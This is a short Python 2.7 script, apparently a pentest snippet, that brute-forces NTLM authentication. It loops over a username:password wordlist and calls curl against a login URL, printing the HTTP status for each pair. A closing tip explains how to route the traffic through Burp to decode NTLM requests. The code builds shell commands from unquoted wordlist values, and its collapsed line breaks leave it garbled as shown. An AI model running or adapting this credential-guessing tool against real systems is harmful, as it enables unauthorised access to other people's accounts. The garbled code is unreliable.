#!/usr/bin/python2.7import osimport sysimport time# wordlist contains "username:password" lineswordlist =open("user_pass2.txt","r").read().splitlines()i=0url ="https://example.com/ntlmv2"domain=""# without domain, local authentication#domain = "DOMAIN\\\\" # with domain - escape doubled for python and shellcmd ="curl -s -o /dev/null -w \"%{http_code}\" --silent -k --ntlm -u "for line in wordlist: username = line.split(":")[0] password = line.split(":")[1] time.sleep(2) os.system(cmd + domain + username +":"+ password +" "+ url +";echo ' - "+domain+username+":"+password+"';" ) i+=1
There is a Burp Extension - NTLM Changer Decoder, proxify curl via http_proxy,https_proxy environmental variables within the terminal and confirm you can decode NTLM requests in Burp (Repeater, select extension).